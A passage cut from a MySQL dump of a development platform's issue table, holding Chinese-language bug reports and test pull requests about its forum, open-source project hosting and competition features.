05:51:19','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(147,1,376,'论坛版块的后台管理,添加子版块时有个浮动的菜单,用户点击其他地方时,应该消失。','论坛版块的后台管理,添加子版块时有个浮动的菜单,用户点击其他地方时,应该消失。',NULL,NULL,3,47,1,NULL,46,'2020-08-13 02:04:37','2020-08-13 06:52:18','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(148,1,376,'论坛交流新建板块未正确提示','创建子版块,创建成功未提示,再次点击提示名字重复',NULL,NULL,3,47,1,NULL,1,'2020-08-13 02:08:50','2020-08-13 06:52:29','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(149,1,376,'浏览器版本兼容性问题','有的浏览器打开项目部分功能不行,比如使用360安全浏览器无法打开开源项目。',NULL,NULL,1,NULL,1,NULL,46,'2020-08-13 02:09:22','2020-08-25 08:49:08','2020-08-13',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(150,1,376,'开源项目,任务中上传文件成功,但是看不到文件。',NULL,NULL,NULL,3,47,3,NULL,1,'2020-08-13 02:11:36','2020-08-20 03:06:33','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(151,1,376,'二级板块问题','新建二级板块,后台管理页面显示为一级板块。二级板块也可以新建自己的二级板块,所有的板块后台都是一级板块,论坛交流里全是二级板块',NULL,NULL,3,47,1,NULL,1,'2020-08-13 02:15:46','2020-08-13 06:52:56','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(152,1,376,'论坛交流,审核申请删帖失败',NULL,NULL,NULL,3,47,1,NULL,1,'2020-08-13 02:16:44','2020-08-13 07:14:14','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(153,1,376,'论坛交流,帖子和回复审核,应分类(已审核,未审核...)',NULL,NULL,NULL,3,47,1,NULL,1,'2020-08-13 02:24:41','2020-08-13 07:28:08','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(156,1,370,'开源项目--新建文件需清空','在开源项目点击新建文件,需清空文件内容,不需要“请输入内容”',NULL,NULL,1,NULL,1,NULL,46,'2020-08-14 00:28:49','2020-08-14 00:28:49','2020-08-14',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(158,1,376,'开源项目--新建文件,需清空','在开源项目点击新建文件,需清空文件内容,不需要“请输入内容”',NULL,NULL,3,NULL,1,NULL,46,'2020-08-14 00:30:09','2020-08-20 07:05:37','2020-08-14',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(159,1,376,'开源项目--新建文件--返回','在开源项目创建完文件后,最好回到创建文件的分支,如在dev分支下创建的文件,应回到dev分支,而不是都回到master',NULL,NULL,3,NULL,1,NULL,46,'2020-08-14 00:33:59','2020-08-20 02:56:40','2020-08-14',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(160,1,376,'开源项目--协作者管理--添加成员','开源项目--协作者管理--添加成员,对成员的搜索有问题,明明改成员存在,但是却提示不存在。',NULL,NULL,3,NULL,1,NULL,46,'2020-08-14 00:49:20','2020-08-20 03:54:02','2020-08-14',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(161,1,376,'开源项目--新建文件--提示','开源项目--新建文件--编辑文件后提示错误,无法提交',NULL,NULL,1,NULL,1,NULL,46,'2020-08-14 01:10:40','2020-08-24 02:01:00','2020-08-14',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(162,1,376,'开源项目--任务计数','任务计数显示错误',NULL,NULL,3,NULL,1,NULL,46,'2020-08-14 01:31:07','2020-08-20 03:44:06','2020-08-14',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(163,1,376,'开源项目--新建任务--附件丢了','新建任务中,点击上传文件后,作为附件,提示上传成功,但是却无法看到。附件丢了!',NULL,NULL,3,NULL,3,NULL,46,'2020-08-14 01:35:58','2020-08-20 03:06:08','2020-08-14',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(164,1,370,'测试上传文件','测试上传文件',NULL,NULL,1,NULL,1,NULL,66,'2020-08-14 01:37:39','2020-08-14 01:37:39','2020-08-14',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(165,2,370,'测试合并请求','测试合并请求',NULL,NULL,1,NULL,2,NULL,66,'2020-08-14 02:30:44','2020-08-14 02:31:02',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'pull_request',NULL,NULL),(166,1,376,'开源项目类别的前端和后端管理数据不一致','开源项目类别的前端和后端管理数据不一致,导致到过来的项目无法归类,项目都变成其他了',NULL,NULL,1,NULL,1,NULL,46,'2020-08-14 07:36:33','2020-08-20 07:07:07','2020-08-14',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(167,1,376,'论坛--版块无法重命名','论坛--版块无法重命名',NULL,NULL,3,NULL,1,NULL,46,'2020-08-14 07:58:42','2020-08-20 03:04:32','2020-08-14',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(168,1,376,'竞赛--后台无法修改竞赛标题','竞赛--管理员在后台无法修改竞赛标题。修改前后没有区别!',NULL,NULL,3,NULL,1,NULL,46,'2020-08-14 08:15:34','2020-08-25 02:40:33','2020-08-14',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(169,1,376,'板块删除','名为“人工智能3级板块的”无法删除\n\n',NULL,NULL,3,NULL,3,NULL,1,'2020-08-17 01:30:41','2020-08-19 01:57:38','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(170,1,376,'已过期竞赛 点击报名提示','\n链接http://39.105.176.215/competitions/15/enroll',NULL,NULL,3,NULL,1,NULL,1,'2020-08-17 07:06:31','2020-08-17 07:06:31','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(171,1,376,'竞赛活动,通知公告问题','\n\n第一行有一个标题',NULL,NULL,3,47,3,NULL,1,'2020-08-17 07:24:21','2020-08-21 01:13:18','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(172,1,376,'论坛交流 有时无编辑','39.105.176.215/forums/241/detail\n\n\n\n',NULL,NULL,3,NULL,3,NULL,1,'2020-08-17 07:59:04','2020-08-20 00:55:58','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(173,1,376,'帖子标签是反的','\n\nhttp://39.105.176.215/forums/183/detail',NULL,NULL,3,47,1,NULL,1,'2020-08-17 08:00:48','2020-08-19 10:33:55','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(174,1,376,'论坛的markdown上传不了图片','',NULL,NULL,3,NULL,1,NULL,1,'2020-08-17 08:17:40','2020-08-19 10:10:56','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(175,1,376,'账号登录,开源项目还需要重新登录','',NULL,NULL,3,47,5,NULL,1,'2020-08-17 08:38:27','2020-08-19 01:56:41','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(176,1,376,'论坛交流,收藏框内容','\nhttp://39.105.176.215/forums/183/detail',NULL,NULL,3,NULL,1,NULL,1,'2020-08-17 08:44:43','2020-08-17 08:44:43','2020-08-17',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(177,1,268,'dddd','dddd',NULL,NULL,1,NULL,1,NULL,47,'2020-08-17 10:43:57','2020-08-17 10:44:05','2020-08-17',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(178,1,376,'消息管理页面,点击审核没有反应','\nhttp://39.105.176.215/users/innov/user_tidings\n账号:innov',NULL,NULL,3,NULL,1,NULL,1,'2020-08-18 01:01:49','2020-08-19 02:27:05','2020-08-18',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(179,1,376,'开源项目注册','点击去到了 https://www.trustie.net/\n\n网站注册开源项目无法登录',NULL,NULL,3,NULL,3,NULL,1,'2020-08-18 01:15:15','2020-08-19 10:19:59','2020-08-18',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(180,1,376,'论坛评论,变成了发布帖子','\n\n\nhttp://39.105.176.215/forums/336/detail\n\nhttp://39.105.176.215/forums/183/detail',NULL,NULL,3,47,5,NULL,1,'2020-08-18 01:22:13','2020-08-19 01:50:14','2020-08-18',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(181,2,100,'测试文件的删除','测试文件的删除\ngggggggggggggggg',NULL,NULL,1,NULL,1,NULL,1,'2020-08-18 02:46:03','2020-08-18 02:46:26',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'pull_request',NULL,NULL),(182,1,268,'测试新的任务','测试新的任务',NULL,NULL,1,NULL,1,NULL,1,'2020-08-18 09:14:25','2020-08-18 09:14:25','2020-08-18',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(184,4,376,'开源项目个人中心跟网站不一样','',NULL,NULL,1,NULL,2,NULL,1,'2020-08-20 01:00:00','2020-08-20 03:54:55','2020-08-20',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(185,4,376,'开源项目个人中心,修改资料,我的关注 404','\n',NULL,NULL,3,NULL,2,NULL,1,'2020-08-20 01:01:35','2020-08-20 07:05:14','2020-08-20',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(186,4,376,'开源项目网站导顶部航栏,与网站不同','',NULL,NULL,1,NULL,2,NULL,1,'2020-08-20 01:03:25','2020-08-20 03:14:05','2020-08-20',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(187,4,376,'加入项目这个功能还需要吗?','',NULL,NULL,3,NULL,2,NULL,1,'2020-08-20 01:08:31','2020-08-21 00:34:23','2020-08-20',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(188,4,376,'论坛交流,帖子删除后,应该跳转到合适的页面','',NULL,NULL,3,NULL,2,NULL,1,'2020-08-20 01:27:45','2020-08-20 03:32:34','2020-08-20',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(189,2,376,'李国宁的合并','测试合并',NULL,NULL,1,NULL,2,NULL,49,'2020-08-20 01:54:04','2020-08-20 01:55:02',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'pull_request',NULL,NULL),(190,2,376,'gggg','请输入内容ggggg',NULL,NULL,1,NULL,1,NULL,47,'2020-08-20 02:56:15','2020-08-21 00:31:52',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,NULL,0,'pull_request',NULL,NULL),(191,4,268,'测试提交附件对的','测试提交附件对的测试提交附件对的',NULL,NULL,1,NULL,2,NULL,47,'2020-08-20 03:05:28','2020-08-20 03:05:28','2020-08-20',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(193,2,376,'hello','hello',NULL,NULL,1,NULL,2,NULL,47,'2020-08-20 10:26:38','2020-08-20 10:26:38',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'pull_request',NULL,NULL),(194,4,376,'首页图片没有在中心','',NULL,NULL,3,NULL,2,NULL,1,'2020-08-20 11:58:09','2020-08-21 02:33:57','2020-08-20',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(196,4,376,'开源项目 点击消息按钮报错','',NULL,NULL,3,NULL,2,NULL,1,'2020-08-21 00:19:43','2020-08-21 00:19:43','2020-08-21',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(197,4,376,'首页,点击创客空间出错','\nhttp://39.105.176.215/task/list\n链接错了吧',NULL,NULL,3,NULL,2,NULL,1,'2020-08-21 00:39:18','2020-08-21 02:36:18','2020-08-21',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(198,4,376,'论坛交流点击头像出错','\n39.105.176.215/forums/337/detail\n\n39.105.176.215/accounts/undefined',NULL,NULL,3,NULL,2,NULL,1,'2020-08-21 00:46:16','2020-08-21 00:46:38','2020-08-21',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(199,4,376,'个人中心,点击项目出错','\n\n39.105.176.215/accounts/innov',NULL,NULL,3,NULL,2,NULL,1,'2020-08-21 00:50:54','2020-08-21 00:50:54','2020-08-21',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(200,4,376,'个人中心,板块出错','\n\n39.105.176.215/accounts/innov/replies',NULL,NULL,3,NULL,2,NULL,1,'2020-08-21 00:54:59','2020-08-21 00:54:59','2020-08-21',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(201,4,376,'竞赛活动,通知公告,只能显示一条详细的内容','\nhttp://39.105.176.215/competitions/24/notices?status=1',NULL,NULL,3,NULL,2,NULL,1,'2020-08-21 01:10:43','2020-08-21 01:11:00','2020-08-21',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(202,4,376,'论坛交流,回复审核问题','\n\n有的没有审核就显示出\nhttp://39.105.176.215/forums/232/detail',NULL,NULL,3,NULL,2,NULL,1,'2020-08-21 02:13:48','2020-08-21 02:13:48','2020-08-21',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(203,4,376,'竞赛活动,排行榜无法删除','',NULL,NULL,1,NULL,2,NULL,1,'2020-08-21 07:13:52','2020-08-21 09:00:39','2020-08-21',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(204,4,376,'论坛帖子---标签不一致','论坛帖子的原创标签是怎么添加的?上面是原创下面是来自网络。',NULL,NULL,1,NULL,2,NULL,46,'2020-08-24 01:03:07','2020-08-24 01:29:38','2020-08-24',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(205,4,376,'论坛--版主不一致','论坛首页显示版块的版主与点击进入版块后显示的版主不一致',NULL,NULL,3,NULL,2,NULL,46,'2020-08-24 01:33:39','2020-08-24 02:11:56','2020-08-24',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(206,2,376,'测试新建文件','/* Hello world */\r\n',NULL,NULL,1,NULL,1,NULL,46,'2020-08-24 01:44:15','2020-08-24 01:44:15',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,NULL,0,'pull_request',NULL,NULL),(207,4,376,'论坛版块管理','以管理员身份进入版块管理,在导航提示上显示“课堂讨论”',NULL,NULL,3,NULL,2,NULL,46,'2020-08-24 01:57:15','2020-08-24 02:12:14','2020-08-24',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(208,2,376,'CreateFileForNewTestCreateFileForNewTest','CreateFileForNewTestCreateFileForNewTestCreateFileForNewTest',NULL,NULL,1,NULL,1,NULL,47,'2020-08-24 01:58:44','2020-08-24 01:58:44',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,NULL,0,'pull_request',NULL,NULL),(209,2,376,'CheckGiteaIsPresent','CheckGiteaIsPresentCheckGiteaIsPresentCheckGiteaIsPresent',NULL,NULL,1,NULL,1,NULL,47,'2020-08-24 01:59:58','2020-08-24 01:59:58',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,NULL,0,'pull_request',NULL,NULL),(210,4,376,'开源项目---项目更新时间','开源项目主页上对于项目排序中更新时间,我在项目:OpenSource/0825版本问题 这个项目中,我更新了几个问题,是否更新时间应该排到前面?目前项目更新的依据是什么?仅仅指代码提交吗?',NULL,NULL,1,NULL,2,NULL,46,'2020-08-24 02:04:02','2020-08-24 02:32:27','2020-08-24',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(211,4,376,'论坛--版主设置','在论坛交流模块中,前端的子版块的版主在后台管理中,看不到。应该允许管理员修改版主。',NULL,NULL,3,NULL,2,NULL,46,'2020-08-24 02:19:43','2020-08-25 01:52:33','2020-08-24',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(212,4,376,'开源项目--个人中心无法修改个人信息','开源项目中点击个人中心的点击“修改资料”,目前链接仍然不正确,应该是链接到个人账户管理页面上去。',NULL,NULL,3,NULL,2,NULL,46,'2020-08-24 03:21:19','2020-08-24 03:42:07','2020-08-24',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(213,1,376,'论坛--最新帖子显示不正确','点击论坛交流进入论坛版块,点击“最新”帖子,应该显示最近发布的帖子,实际上不是。',NULL,NULL,1,NULL,2,NULL,46,'2020-08-24 07:46:27','2020-08-25 01:46:40','2020-08-24',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(214,4,376,'论坛--未经审批的回复出现','未经审批的对帖子的回复出现。是浏览器的问题?还是用户权限的问题?一个是管理员权限,火狐浏览器,未审批的回复出现了。一个是普通用户、谷歌浏览器,未审批的帖子没有出现。什么原因?',NULL,NULL,1,NULL,2,NULL,46,'2020-08-24 08:06:27','2020-08-25 01:36:49','2020-08-24',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(215,4,376,'精选版块推荐','在精选版块推荐下面的简介中是否可以提前换行,否则太长了',NULL,NULL,3,NULL,2,NULL,46,'2020-08-24 08:35:35','2020-08-25 08:19:09','2020-08-24',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(216,2,376,'开源项目--新建任务','在开源项目中,用户点击“新建任务”,成功创建后,返回页面应为最新页面,不要用户手工刷新。这也许是浏览器的问题,我这里要点击刷新。应该是打开的窗口太多吧。',NULL,NULL,3,NULL,2,NULL,46,'2020-08-24 08:52:25','2020-08-24 08:54:32','2020-08-24',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(217,4,376,'消息通知','消息通知显示不一致,在铃铛上显示数字,私信也有数字,点击“私信”后,“私信”下的数字没有了,但是铃铛的数字还在。',NULL,NULL,1,NULL,2,NULL,46,'2020-08-24 09:06:47','2020-08-25 09:23:06','2020-08-24',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(218,2,376,'建议任务的图片上传在描述信息里','1. 建议图片上传在描述信息里上传呢,不然,现在每次得下载图片后才能看到图片的信息\n\n\n\n2. 上传步骤: \n(1) 截图可以直接在md编辑器里粘贴上传\n\n(2) 点击md的上传图片的图标: \n\n\n\n',NULL,NULL,3,46,2,NULL,47,'2020-08-25 02:45:16','2020-08-25 08:51:44','2020-08-25',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(219,4,376,'后台管理--主体信息列表','点击后台管理--主体信息列表,出现白屏。\n',NULL,NULL,3,NULL,2,NULL,46,'2020-08-25 07:33:33','2020-08-25 09:30:25','2020-08-25',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(220,4,376,'论坛--点赞自己的帖子跳转不正确','论坛版块点赞自己的帖子出现跳转不正确,跳转到个人中心了。是否可以屏蔽掉对自己帖子的点赞。\n\n\n\n',NULL,NULL,3,NULL,2,NULL,46,'2020-08-25 08:29:50','2020-09-15 00:29:03','2020-08-25',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(221,2,376,'论坛--后台--回复查看跳转','论坛--后台管理点击回复页面的“查看”,目前都统一跳转论坛首页,应该跳转到回复的帖子的那个页面\n\n\n\n',NULL,NULL,3,NULL,2,NULL,46,'2020-08-26 06:51:37','2020-08-26 10:21:49','2020-08-26',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(222,2,376,'开源项目--代码库','开源项目中,选择http://39.105.176.215:49999/projects/p04153627/ranking, 点击“代码库”,选择src->main-->java-->com-->ossean,进入图1界面如下\n\n\n\n选择“MergeProjects.java”,显示界面如图2所示:\n\n\n\n点击“ossean” 如图3所示,\n\n\n\n应该回到图1,实际返回界面如图4所示\n\n',NULL,NULL,3,NULL,2,NULL,46,'2020-08-26 08:46:20','2020-08-27 06:01:29','2020-08-26',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(223,4,392,'ddd','dddd',NULL,NULL,1,NULL,2,NULL,1,'2020-09-07 08:34:03','2020-09-07 08:34:39','2020-09-07',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(224,2,397,'添加系统描述文件','',NULL,NULL,1,NULL,1,NULL,49,'2020-10-15 00:55:34','2020-10-15 00:56:46',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,NULL,0,'pull_request',NULL,NULL),(225,2,370,'测试合并请求dev==》master','测试合并请求dev==》master',NULL,NULL,1,46,2,23,46,'2020-10-15 06:55:11','2020-10-15 06:55:11',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'pull_request',NULL,NULL),(226,2,370,'添加Java源程序','添加Java Source文件',NULL,NULL,1,46,2,NULL,46,'2020-10-16 02:06:31','2020-10-16 02:06:31',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'pull_request',NULL,NULL),(227,1,376,'开源项目--新建镜像项目速度太慢','从码云或GitHub上复制镜像地址,新建镜像项目,速度太慢,最少5分钟以上。',NULL,NULL,1,NULL,2,NULL,46,'2020-10-22 08:15:18','2020-10-22 08:15:18','2020-10-22',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(228,4,376,'创客空间---任务各阶段的时间','在创客空间中任务各阶段的时间,只关联本阶段的时间,比如评审阶段设置为5天,结果公示设定为3天,若雇主在第3天就提交了佐证材料,任务会进入结果公示,但公示阶段不应该把评审阶段剩余的2天时间加入公示阶段,公示时间仍为3天,而不是5天。',NULL,NULL,1,NULL,2,NULL,46,'2020-10-22 08:20:23','2020-10-22 08:20:23','2020-10-22',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(250,2,473,'测试','测试',NULL,NULL,1,155,2,NULL,155,'2021-01-22 08:12:52','2021-01-22 08:13:20',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(251,4,473,'新建任务01','新建任务01',NULL,NULL,1,155,4,26,155,'2021-01-22 08:18:53','2021-01-25 05:34:07','2021-01-22',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(252,4,474,'标题','标题',NULL,NULL,1,NULL,2,NULL,155,'2021-01-25 05:38:12','2021-01-25 05:38:12','2021-01-25',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(253,2,473,'test','test',NULL,NULL,1,NULL,2,NULL,155,'2021-01-25 05:56:06','2021-01-25 05:56:06',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(254,2,477,'测试合并',NULL,NULL,NULL,5,156,2,NULL,122,'2021-01-26 02:15:42','2021-01-27 11:04:21',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(255,4,477,'修改Readme文件','修改Readme文件内容,参照其他开源软件内容。',NULL,NULL,1,122,2,NULL,156,'2021-01-26 09:24:05','2021-01-26 09:24:05','2021-01-26',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(256,2,477,'merge readme','merge readme',NULL,NULL,5,156,2,NULL,122,'2021-01-28 07:09:03','2021-02-09 09:18:57',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(257,4,389,'我的第一个issue','这是issue的内容',NULL,NULL,1,NULL,2,NULL,48,'2021-01-28 07:27:01','2021-01-28 07:27:01','2021-01-28',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(258,4,370,'code smell','第10行存在code smell',NULL,NULL,1,NULL,2,NULL,115,'2021-01-28 09:07:32','2021-01-28 09:07:32','2021-01-28',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(259,4,477,'贡献者加入错误','目前项目管理员无法添加贡献者。',NULL,NULL,1,NULL,2,NULL,46,'2021-01-28 09:15:44','2021-01-28 09:15:44','2021-01-28',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(260,4,477,'提示语出错','提示语出错',NULL,NULL,1,NULL,2,NULL,49,'2021-01-28 09:25:31','2021-01-28 09:25:31','2021-01-28',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(261,4,329,'贡献者加入错误','contributor cannot be added in',NULL,NULL,1,NULL,2,NULL,46,'2021-01-28 09:46:21','2021-01-28 09:46:21','2021-01-28',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(262,2,477,'merge readme2','merge readme2',NULL,NULL,1,NULL,2,NULL,122,'2021-02-09 09:21:04','2021-02-22 11:19:55',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(263,4,477,'风雷软件文档打开错误','在风雷项目中选择PHengLEIPHengLEIDocuments风雷软件应用与开发指南2012.v7129.pdf 下载,报404错误\n\n\n而且还会出现登录界面?我已经登录过了,什么情况?',NULL,NULL,1,NULL,2,NULL,46,'2021-02-18 01:46:59','2021-02-18 01:46:59','2021-02-18',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(264,4,494,'asdf','test','2021-02-28',NULL,1,49,2,28,49,'2021-02-22 08:33:51','2021-02-22 08:33:51','2021-02-04',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'6',0,'issue',NULL,''),(265,4,494,'asdf','test','2021-02-28',NULL,1,49,2,28,49,'2021-02-22 08:33:56','2021-02-22 08:33:56','2021-02-04',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'6',0,'issue',NULL,''),(266,2,494,'fork','fork',NULL,NULL,1,NULL,2,NULL,73,'2021-02-22 09:07:48','2021-02-22 09:08:50',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(267,2,477,'修改之后试一下二次pr','修改之后试一下二次pr',NULL,NULL,1,NULL,2,NULL,122,'2021-02-22 11:21:06','2021-02-22 11:21:42',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(268,2,477,'changed by cb','changed by cb',NULL,NULL,1,NULL,2,NULL,137,'2021-02-22 11:28:34','2021-02-22 11:28:34',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(270,2,430,'不能随便打字','好的',NULL,NULL,5,134,2,NULL,128,'2021-02-25 10:39:42','2021-02-25 10:39:50',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',0,'',0,'pull_request',NULL,NULL),(273,4,376,'开源项目--新账号,使用邮箱无法克隆,使用用户名可以克隆','',NULL,NULL,1,NULL,2,NULL,73,'2021-03-01 08:24:29','2021-03-03 